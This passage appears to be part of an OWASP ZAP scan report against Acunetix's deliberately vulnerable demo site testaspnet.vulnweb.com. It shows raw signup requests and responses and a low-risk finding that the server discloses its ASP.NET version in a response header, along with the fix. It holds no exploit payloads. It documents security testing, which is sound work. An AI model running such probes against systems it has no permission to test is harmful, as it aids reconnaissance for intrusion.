AgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Signup.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (399 bytes)
POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1098 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1098 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+upResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 13177Response body (13177 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
-
-
-
Risk=低, Confidence=中等的 (99)
-
http://testaspnet.vulnweb.com (99)
-
